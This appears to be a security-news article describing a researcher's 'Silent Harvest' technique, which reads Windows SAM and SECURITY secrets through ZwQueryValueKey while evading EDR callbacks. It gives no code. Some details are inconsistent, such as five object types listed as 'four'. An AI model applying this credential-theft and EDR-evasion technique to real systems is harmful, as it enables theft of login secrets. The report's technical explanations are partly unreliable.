Unnoticed Extraction of Windows Secrets: Stealthy Data Retrieval Techniques Unveiled
In a groundbreaking revelation, security researcher Sud0Ru has demonstrated a new technique called "Silent Harvest." This method, designed to bypass both access controls and common Endpoint Detection and Response (EDR) detection mechanisms, leverages internal Windows functions.
The technique, as detailed by Sud0Ru, operates entirely in memory, leaving no traces that could be registered by monitoring systems. This stealthy approach is achieved by utilising the undocumented native API "ZwQueryValueKey."
The Windows subsystem responsible for managing secrets and login information is the Local Security Authority (LSA), which runs within the lsass.exe process. The LSA manages two in-memory databases: the SAM database and the Security database (Policy). User login information is stored in the SAM structure, while Windows Secrets, such as cached domain login information and computer keys, are stored in the SECURITY-Hive.
EDR drivers often register and pass a callback function address. Whenever the registry is accessed, the kernel calls this function and passes two important pieces of information. By exploiting this mechanism, Silent Harvest can retrieve the type and data for a list of value names associated with an open registry key.
The function call to ZwQueryValueKey, even for highly sensitive values in SAM or SECURITY, did not trigger any alerts on any tested EDR platform. This is because the data type and length of the value are filled in after the call returns, and these values are stored in encrypted form and require additional steps to decrypt them.
The SAM database stores four primary object types: Server, Domain, User, Alias, and Group. The Security database manages four key objects: Policy, Trusted Domain, Account, and Secret. Overlooked functions often provide simple ways to circumvent defensive assumptions, and Silent Harvest is no exception.
This research demonstrates how to use such internal Windows functions to bypass both access controls and common EDR detection mechanisms with minimal code. It's a stark reminder of the need for continuous security vigilance and the importance of staying abreast of the latest threats and countermeasures.
